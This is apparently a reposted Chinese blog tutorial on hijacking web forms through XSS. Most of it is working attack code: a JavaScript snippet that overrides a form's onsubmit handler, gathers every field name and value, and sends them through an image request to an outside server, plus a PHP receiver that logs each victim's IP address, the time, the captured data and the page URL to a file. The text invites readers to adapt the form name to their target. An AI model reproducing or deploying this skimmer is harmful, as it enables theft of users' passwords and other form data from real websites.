溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
大家都知道,在提交form表單時會調用onsubmit方法,既然調用了onsubmit,說明表單中該填的項肯定都已經填好了,這時,我們通過修改onsubmit方法,便可以獲取表單中的信息.
xss.js:
var f=document.forms['from1'];
if(f==undefined)
{
f=document.getElementById('');
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
var str='';
for(var i=0;i<f.elements.length;i++)
{
str+=f.elements[i].name+':'+f.elements[i].value+'||';
}
str=str.substr(0,str.length-2);
var img=new Image();
img.src='https://blog.51cto.com/xss.php?data='+escape(str)+'&url='+escape(location.href);
func(event);
return true;
}
根據各程序不同,修改表單名稱
var f=document.forms['form1'];
接收端xss.php
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['data'];
$url = $_GET['url'];
$time = gmdate("H:i:s",time()+8*3600);
$file = "jzking121.txt" ;
$fp=fopen ("jzking121.txt","a") ;
$txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n";
fputs($fp,$txt);
?>參考:
http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
